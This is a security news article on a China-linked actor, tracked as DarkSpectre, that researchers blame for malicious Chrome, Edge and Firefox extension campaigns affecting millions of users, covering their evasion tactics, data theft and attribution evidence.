A Chinese-linked threat actor is believed to be behind thee major malicious browser extension campaigns that have compromised millions of users across Google Chrome, Microsoft Edge, and Mozilla Firefox.
Security researchers at Koi Security have linked the activity to a threat actor they track as ‘DarkSpectre,’ which they say has affected more than 8.8 million users over a span of seven years. The latest campaign, dubbed ‘DarkSpectre,’ alone impacted 2.2 million users through malicious browser extensions distributed across the three major browsers.
Earlier this month, Koi Security revealed the ShadyPanda campaign, which targeted users with extensions designed for data theft, search query hijacking, and affiliate fraud. ShadyPanda is estimated to have infected 5.6 million users. An Edge add-on, called “New Tab – Customized Dashboard,” contained a logic bomb that delayed malicious activity for three days, likely to evade marketplace reviews. While nine extensions remain active, researchers identified 85 dormant “sleeper” extensions that appeared benign for years before receiving malicious updates.
The second campaign, tracked as GhostPoster, primarily targeted Firefox users with fake utilities and VPN tools that injected malicious JavaScript to hijack affiliate links and conduct click and ad fraud. Investigators also uncovered related extensions on other platforms, including a Google Translate add-on for Opera with nearly one million installs.
The most recent campaign, known as ‘The Zoom Stealer,’ involves 18 extensions masquerading as productivity tools for enterprise video conferencing platforms. The add-ons harvested sensitive corporate intelligence, including meeting URLs with embedded passwords, meeting IDs, participant lists, and scheduling details, transmitting the data in real time via WebSocket connections. Researchers found the extensions requesting access to more than 28 video conferencing services, including Zoom, Microsoft Teams, Google Meet, Cisco WebEx, and GoTo Webinar.
Koi Security has attributed the operations to China based on multiple indicators, including command-and-control (C&C) servers hosted on Alibaba Cloud, Chinese ICP registrations, Chinese-language code artifacts, and fraud schemes targeting local e-commerce platforms such as JD.com and Taobao.
